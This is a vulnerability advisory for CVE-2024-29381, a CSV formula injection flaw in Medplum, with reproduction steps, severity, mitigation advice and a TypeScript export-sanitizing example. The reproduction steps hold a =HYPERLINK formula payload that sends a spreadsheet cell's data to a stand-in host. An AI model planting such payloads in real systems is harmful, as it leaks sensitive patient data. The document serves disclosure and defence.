CVE Number
CVE-2024-29381
Loginsoft ID
Loginsoft-2024-1012
Description
The application “Medplum” is affected by a CSV/formula injection vulnerability, posing a risk of exposing sensitive data. An attacker could inject a malicious payload into input fields. Subsequently, when a high-privileged user exports the data as CSV, the injected payload may be executed.
CWE
CWE-1236: Improper Neutralization of Formula Elements in a CSV File
Affected Versions
< v3.0.8
CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N 6.8 (Medium)
Steps To Reproduce
- Create a new patient with the gender field set to the payload `=HYPERLINK("http://localhost:8181/?data="&F3,"Click Me")`.
- Export the patient data in CSV format.
- Open the CSV file, press the Ctrl key, and left click on the cell with the value Click Me.
- Doing this exposes the sensitive data of the user located in cell F3.
Impact
Exposure of sensitive data.
Mitigation
Convert each field into text when exporting as CSV. Additionally, add filters to the input fields.
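One way to apply the "convert each field into text" mitigation at export time, as an added TypeScript example (not Medplum's code and not the change in the linked pull request). `neutralizeCell`, `toCsv` and the sample rows are hypothetical names and constructed data; the set of leading characters follows OWASP's CSV injection guidance.

```typescript
// Added example: neutralize formula cells when building a CSV export.
// neutralizeCell, toCsv and SAMPLE_ROWS are hypothetical, not Medplum's code.

// Leading characters that make a spreadsheet evaluate a cell as a formula
// (the set listed in OWASP's CSV injection guidance).
const FORMULA_PREFIX = /^[=+\-@\t\r]/;

function neutralizeCell(value: unknown): string {
  let text = value === null || value === undefined ? '' : String(value);
  // Only strings are prefixed, so a real number such as -5 stays numeric.
  if (typeof value === 'string' && FORMULA_PREFIX.test(text)) {
    // With a leading apostrophe the cell no longer starts with a formula
    // character, so the spreadsheet reads it as text.
    text = "'" + text;
  }
  // Quote every field and double embedded quotes (RFC 4180), so the payload's
  // own quotes and commas cannot break out into neighbouring cells.
  return '"' + text.replace(/"/g, '""') + '"';
}

function toCsv(header: string[], rows: unknown[][]): string {
  const all: unknown[][] = [header, ...rows];
  return all.map((row) => row.map(neutralizeCell).join(',')).join('\r\n');
}

// Constructed sample data: the gender value is the payload from the steps above.
const SAMPLE_ROWS: unknown[][] = [
  ['p-001', 'Alice Example', 'female'],
  ['p-002', 'Mallory Example', '=HYPERLINK("http://localhost:8181/?data="&F3,"Click Me")'],
];

const SAMPLE_CSV = toCsv(['id', 'name', 'gender'], SAMPLE_ROWS);
console.log(SAMPLE_CSV);
```

Input filtering on the form fields complements this, but the export-side encoding is what protects data that was stored before any filter existed.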
Fix
https://github.com/medplum/medplum/pull/4079
Discovered Date
15 February 2024
Reported Date
19 February 2024
Patched Date
03 March 2024
Credit
Saharsh Agrawal